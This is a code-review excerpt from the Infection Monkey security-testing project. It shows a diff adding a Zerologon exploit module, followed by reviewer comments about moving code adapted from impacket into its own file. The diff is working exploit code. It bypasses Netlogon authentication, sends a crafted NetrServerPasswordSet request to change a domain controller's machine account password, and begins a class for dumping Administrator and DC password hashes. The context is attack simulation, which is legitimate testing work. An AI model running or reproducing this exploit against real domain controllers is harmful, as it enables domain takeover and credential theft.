monkey/infection_monkey/exploit/zerologon.py

```diff
@@ -0,0 +1,743 @@
+        server_challenge = server_challenge_response['ServerChallenge']
+
+        try:
+            server_auth = nrpc.hNetrServerAuthenticate3(
+                rpc_con, self.dc_handle + '\x00', self.dc_name + '$\x00',
+                nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
+                self.dc_name + '\x00', ciphertext, flags
+            )
+
+            # It worked!
+            assert server_auth['ErrorCode'] == 0
+            # server_auth.dump()
+            session_key = nrpc.ComputeSessionKeyAES(None, b'\x00'*8, server_challenge,
+                                                    unhexlify("31d6cfe0d16ae931b73c59d7e0c089c0"))
+
+            try:
+                authenticator = nrpc.NETLOGON_AUTHENTICATOR()
+                authenticator['Credential'] = ciphertext
+                authenticator['Timestamp'] = b"\x00" * 4
+
+                nrpc.NetrServerPasswordSetResponse = NetrServerPasswordSetResponse
+                nrpc.OPNUMS[6] = (NetrServerPasswordSet, nrpc.NetrServerPasswordSetResponse)
+
+                request = NetrServerPasswordSet()
+                request['PrimaryName'] = NULL
+                request['AccountName'] = self.dc_name + '$\x00'
+                request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
+                request['ComputerName'] = self.dc_name + '\x00'
+                request["Authenticator"] = authenticator
+                pwd_data = impacket.crypto.SamEncryptNTLMHash(unhexlify(original_pwd_nthash), session_key)
+                request["UasNewPassword"] = pwd_data
+                rpc_con.request(request)
+
+            except Exception as e:
+                LOG.info(f"Unexpected error: {e}")
+
+            return rpc_con
+
+        except nrpc.DCERPCSessionError as e:
+            # Failure should be due to a STATUS_ACCESS_DENIED error; otherwise, the attack is probably not working.
+            if e.get_error_code() == 0xc0000022:
+                return None
+            else:
+                LOG.info(f"Unexpected error code from DC: {e.get_error_code()}")
+
+        except BaseException as e:
+            LOG.info(f"Unexpected error: {e}")
+
+
+class NetrServerPasswordSet(nrpc.NDRCALL):
+    opnum = 6
+    structure = (
+        ('PrimaryName', nrpc.PLOGONSRV_HANDLE),
+        ('AccountName', nrpc.WSTR),
+        ('SecureChannelType', nrpc.NETLOGON_SECURE_CHANNEL_TYPE),
+        ('ComputerName', nrpc.WSTR),
+        ('Authenticator', nrpc.NETLOGON_AUTHENTICATOR),
+        ('UasNewPassword', nrpc.ENCRYPTED_NT_OWF_PASSWORD),
+    )
+
+
+class NetrServerPasswordSetResponse(nrpc.NDRCALL):
+    structure = (
+        ('ReturnAuthenticator', nrpc.NETLOGON_AUTHENTICATOR),
+        ('ErrorCode', nrpc.NTSTATUS),
+    )
+
+
+# Adapted from https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py
+# Used to get Administrator and original DC passwords' hashes
+class DumpSecrets:
```

Comment:
I think this class should end up in a separate file

Reply:
The code taken from impacket should be in a seperate file with a clear copyright notice.
@mssalvatore